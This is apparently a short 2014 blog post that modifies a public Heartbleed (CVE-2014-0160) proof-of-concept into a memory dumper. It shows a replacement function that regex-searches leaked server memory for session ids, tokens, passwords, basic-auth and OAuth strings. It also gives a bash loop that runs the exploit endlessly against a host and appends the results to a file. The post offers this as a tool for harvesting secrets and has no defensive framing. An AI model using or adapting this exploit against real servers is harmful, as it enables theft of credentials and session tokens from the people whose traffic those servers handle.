вторник, 8 апреля 2014 г.

Memory dumper based on CVE-2014-0160

You already know about this bug of course:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160

Just easy patch to original PoC: https://gist.github.com/ixs/10116537

 60 def hexdump(s):
 61   r = r"((sid|token|sess|pass|basic|oauth).*)"
 62   m = re.findall(r,s)
 63   print m
 64   sys.exit()
And some bash now:
~$ while true; do ./ssltest.py company.com >> regexped; done


We have plans to rewrite this PoC to use only one socket for multiple dumps.